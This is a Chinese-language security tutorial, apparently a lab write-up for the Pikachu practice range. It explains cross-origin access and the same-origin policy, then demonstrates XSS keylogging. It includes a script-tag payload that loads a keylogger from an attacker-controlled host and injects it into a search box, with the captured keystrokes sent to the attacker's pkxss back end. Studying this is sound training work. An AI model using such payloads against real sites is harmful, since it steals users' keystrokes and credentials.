什么是跨域

http:// www . xyz.com : 8080 / script/test.js
协议 子域名 主域名 端口 资源地址
当协议、主机（主域名，子域名）、端口中的任意一个不相同时，称为不同域
我们把不同的域之间请求数据的操作，成为跨域操作。
跨域-同源策略
而为了安全考虑，所有的浏览器都约定了“同源策略”，同源策略规定，两个不同域名之间不能使用JS进行相互操作。比如：x.com域名下的javascrip并不能操作y.com域下的对象。
如果想要跨域操作，则需要管理员进行特殊的配置。 比如通过：header(“Access-Control-Allow-Origin:x.com”)指定。
Tips: 下面这些标签跨域加载资源（资源类型是有限制的）是不受同源策略限制的。

<script src=“…”> //js,加载到本地执行
<img src=“…”> //图片
<link href=“…”> //css
<iframe src=“…”> //任意资源

为什么要有同源策略：

A登陆了淘宝，攻击者向A发送一个恶意链接urlb:http://www.盗你cookie.com 。如果没有同源策略，即：urlb上的js可以操作A的内容（如：获取cookie等） ,有了同源策略，就限制了这种情况。 再比如： 一个恶意站点A上使用了，发送该恶意url到攻击对象，攻击对象登陆后如果没有同源策略，则A上的JS即可获取B站点的登陆信息。
网络钓鱼就是我们现在攻击方嵌入js代码，代码指向我们组织好的的攻击代码，当用户浏览攻击页面的时候，js代码执行，攻击代码执行，攻击代码中有一个函数（javascript中有一个方法叫做event.keycode方法他能够记录键盘的输入），当他收取到输入之后，再发给我们的后台。在代码中通过ajax，用post请求发送键盘输入的入侵者的IP地址信息如图：下面的IP地址是入侵者的

允许被所有人进行访问

输入设置好的恶意JS代码：

<script src="http://192.168.30.168/pikachu/pkxss/rkeypress/rk.js"></script>
然后在键盘上随意输入，就可以到xss平台上去查看键盘输入的结果

将恶意JS代码输入到搜索框中，进行提交

在页面随意输入字母：hgqqq

后台pkxss平台获取键盘记录